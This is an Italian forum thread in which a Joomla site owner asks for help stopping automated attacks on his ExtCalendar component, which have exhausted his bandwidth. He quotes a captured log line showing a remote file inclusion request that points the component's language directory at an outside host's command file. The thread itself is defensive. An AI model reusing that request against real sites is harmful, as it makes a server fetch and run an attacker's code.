joomla, componente e lamer furbone

[guru]

Ciao a tutti, su uno dei siti che ho in hosting presso server plan ho joomla e il componente extcalendar, e fin qui tutto ok.

Questo mese la banda del mio sito ? aumentata notevolmente, tant'? che il sito ? stato sospeso.

Finalmente ho scoperto il perch?: un fottutissimo lamer.

Il furbone si sta divertendo a fanciare delle chiamate (con il perl) per sfruttare una vulnerabilit?.

Per fermarlo ho pensato di aggiungere una riga al file .htaccess, ho notato per? che il suo ip di provenienza varia, la cosa costante ? per? questa:
"GET /component/option,com_extcalendar/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://molganinovo.ru/cmd.txt? HTTP/1.1" 200 12671 "-" "libwww-perl/5.79"

Qualcuno sa darmi un mano per fare una regola per farsi che ogni qualvolta si chiami un url che contiene la frase http://molganinovo.ru/cmd.txt appaia solo una scritta (tipo fuck) e nient'altro? :-)

Grazie.

P.S. Lo posto qui, almeno pu? esser utile anche ad altri.

[mbmihele]

Per una soluzione su htaccess mi hanno segnalato questo sito

prova a vedere se pu? fare al caso tuo

http://www.javascriptkit.com/howto/htaccess10.shtml

Ciao

[guru]

Grazie, ma putroppo non sono riuscito a far nulla.

A causa dell'elevato numero di chiamate, sono stato costretto a disainstallare il modulo, cos? l'attacker riceve solo la pagina 404.

Facendo l'analisi dei log ho trovato che in 20 giorni ho ricevuto attacchi da ben 1200 ip diversi!
Quando di bannarli non se ne parla!

Che mi consigliate di fare?
Una denuncia credo che serva a poco, cos? come l'avvertire tutti i proprietari dei server!

Ciao.